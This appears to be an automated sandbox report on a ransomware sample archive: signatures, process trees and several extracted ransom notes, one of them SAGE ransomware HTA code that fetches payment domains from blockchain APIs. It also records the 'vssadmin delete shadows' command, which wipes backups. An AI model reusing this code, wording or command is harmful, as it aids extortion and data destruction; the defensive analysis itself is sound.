Overview

overview

10

Static

static

1

RNSM00325.7z

windows7-x64

10

Analysis

  • max time kernel
    127s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    12-11-2024 17:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00325.7z

  • Size

    1.6MB

  • MD5

    578a90c19beddfcd819e9a6aaec2018c

  • SHA1

    9b76ef908d81691a0af9361ae4401d7fa3b9c21a

  • SHA256

    7726f4c7c58243759dd8f3a68617657a623b28ba648c0a53a1a8ce7fe33c99cb

  • SHA512

    b469676d0b4cc5e4b9e7ea04cf43619c1bcbd25a9a98f1313e69efb36b6784d5549f40b3c5607e1ca6c4326c1c1a9776859896d7a6df7f00b10e15c314983832

  • SSDEEP

    49152:RBjx79qjSJVqk/xjopabNBFqkr1JCXegfvfL:TN7hJVqk/+4bLFCuGT

Score
10/10
dharmagandcrabbackdoorcredential_accessdefense_evasiondiscoveryevasionexecutionimpactpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\Documents\READ_THIS_TO_DECRYPT.html

Ransom Note
<html> <head> <title>-</title> <style> html {font-family:Consolas;font-size:20px;background-color:lightgrey;} div{ margin:0 auto 15px auto; border:1px solid; background-color:grey;} p,h3{ text-align:center; color:white; } #R{background-color:darkred;} button{padding:10px 15px; margin:15px;} </style> </head> <body> <div> <h3>YOU PERSONAL FILES HAS BEEN ENCRYPTED</h3> <p>-</p> <p>Your data (photos, documents, databases etc.) have been encrypted with a private and unique key generated for this computer. This means that you will not be able to access your files anymore until they are decrypted. The privete key is stored in our servers and the only way to receive your key to decrypt your files is making a payment.</p> </div> <div> <p>The payment has to be done in Bitcoin to a unique address that we generated for you. Bitcoins are the virtual currency to make online payments. If you don't know how to get Bitcoins, you can click the button "How to buy Bitcoins" below and follow the instructions. If you have problem with this task use internet.</p> <p><abbr style="color:red;background-color:black;">You have only 1 week to submit the payment.</abbr> When this time ends, the unique key will be destroyed and you won't be able to recover your files anymore.</p> </div> <div id="R"><h3>YOUR UNIQUE KEY WILL BE DESTROYED IN 1 WEEK FROM ENCRYPTION!</h3></div> <div> <p>To recover your files, you must send 0.1 Bitcoins ( ~$37 ) to the next Bitcoin address:</p> <p><abbr style="background-color:white;font-size:35px;color:black;">15F5FM7qMhLQ44RDxuozbKRwSbHKmq7N39</abbr></p> <a target="_blank" href="https://bitcoin.org/en/getting-started"><button>How to buy Bitcoins #1</button></a> <a target="_blank" href="https://en.bitcoin.it/wiki/Buying_Bitcoins_(the_newbie_version)"><button>How to buy Bitcoins #2</button></a> </div> </body> </html>

Extracted

Path

C:\Users\Admin\Desktop\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); // tweakClass('links', function(el){ el.innerHTML = err; }); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AR0ytFu0O8h3o97YNzStxyxnw7KWrIUfkYKsV-xW_0iTztgsb51JnC3A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2> <h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2> <h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2> <h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2> <h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2> <h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2> <h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2> <h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2> <h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2> <h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2> <h2>Action required to restore your files.</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys links'> <div class='key'> <a href="http://7gie6ffnkrjykggd.2kzm0f.com/login/AR0ytFu0O8h3o97YNzStxyxnw7KWrIUfkYKsV-xW_0iTztgsb51JnC3A" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.2kzm0f.com/</a> </div> <div class='key'> <a href="http://7gie6ffnkrjykggd.6t4u2p.net/login/AR0ytFu0O8h3o97YNzStxyxnw7KWrIUfkYKsV-xW_0iTztgsb51JnC3A" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.6t4u2p.net/</a> </div> </div> <div class='info lu lu-orig'> <p>If none of these links work for you, <a href='#' onclick='javascript:return updateLinks()'><b>click here</b></a> to update the list.</p> </div> <div class='info lu lu-updating'> <p>Updating links...</p> </div> <div class='info lu lu-error'> <p>Something went wrong while updating links, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <div class='info lu lu-done'> <p>Links updated, if new ones still don't work, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <p>If you are asked for your personal key, copy it to the form on the site. This is your personal key:</p> <div class='keys'> <div class='key'> AR0ytFu0O8h3o97YNzStxyxnw7KWrIUfkYKsV-xW_0iTztgsb51JnC3A </div> </div> <p>You will also be able to decrypt one file for free to make sure "SAGE Decrypter" software is able to recover your files</p> <div class='info'> <p>If none of those links work for you for a prolonged period of time or you need your files recovered as fast as possible, you can also access your personal page using "Tor Browser".</p> <p>In order to do that you need to:</p> <ol> <li>open Internet Explorer or any other internet browser;</li> <li>copy the address <a href='https://www.torproject.org/download/download-easy.html.en' onclick='javascript:return openlink(this.href)'>https://www.torproject.org/download/download-easy.html.en</a> into address bar and press "Enter";</li> <li>once the page opens, you will be offered to download Tor Browser, download it and run the installator, follow installation instructions;</li> <li>once instal
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta

Ransom Note
All your files have been encrypted! All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email protected] Write this ID in the title of your message 2FA84094 In case of no answer in 24 hours write us to theese e-mails: [email protected] You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. Free decryption as guarantee Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) How to obtain Bitcoins The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention! Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Signatures

  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

    ransomwaredharma
  • Dharma family
    dharma
  • GandCrab payload 1 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Gandcrab family
    gandcrab
  • Contacts a large (7702) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (310) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Drops startup file 8 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 9 IoCs
    persistence
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 14 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1208
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00325.7z"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2588
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
          HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of SetWindowsHookEx
          PID:1280
          • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
            C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Agent.gen-e90b8419e7739a97f889f6bbc51f9e059df18a47910f9033bf5fa447cb2f8030.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1328
            • C:\Users\Admin\AppData\Roaming\YI89EL.exe
              "C:\Users\Admin\AppData\Roaming\YI89EL.exe"
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              PID:3980
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k
                6⤵
                • Maps connected drives based on registry
                PID:4072
        • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-a4934922ea9e1e6924f24bba64af5888d2b4df87ffb938d92304a5677549899b.exe
          HEUR-Trojan-Ransom.Win32.GandCrypt.gen-a4934922ea9e1e6924f24bba64af5888d2b4df87ffb938d92304a5677549899b.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          PID:1792
        • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
          HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
          3⤵
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1688
          • C:\Users\Admin\Desktop\00325\HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
            HEUR-Trojan-Ransom.Win32.Generic-57a3608b1b0d7f6a573ea4505b77c593141ce21d72cf45e6f86944fc5870c850.exe
            4⤵
            • Executes dropped EXE
            PID:3016
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.meia-b551241303307afef35b5e175cf8443c027ca7607dcd93ca1d78021c16cd38d6.exe
          Trojan-Ransom.Win32.Blocker.meia-b551241303307afef35b5e175cf8443c027ca7607dcd93ca1d78021c16cd38d6.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: MapViewOfSection
          PID:1480
          • C:\Windows\SysWOW64\explorer.exe
            "C:\Windows\system32\explorer.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2912
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
          Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:3024
          • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
            Trojan-Ransom.Win32.Blocker.zkt-6a4f14618791840a889291b8285f00d9480811b4608044e26e162766b17d3225.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:3952
        • C:\Users\Admin\Desktop\00325\Trojan-Ransom.Win32.Crusis.to-153834ac3c6b67f479548e8069a1de8419764a18df200bd429eb77c062d1b36d.exe
          Trojan-Ransom.Win32.Crusis.to-153834ac3c6b67f479548e8069a1de8419764a18df200bd429eb77c062d1b36d.exe
          3⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops desktop.ini file(s)
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: RenamesItself
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2424
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              5⤵
                PID:1528
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                5⤵
                • Interacts with shadow copies
                PID:696
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              4⤵
                PID:4672
                • C:\Windows\system32\mode.com
                  mode con cp select=1251
                  5⤵
                    PID:2788
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin delete shadows /all /quiet
                    5⤵
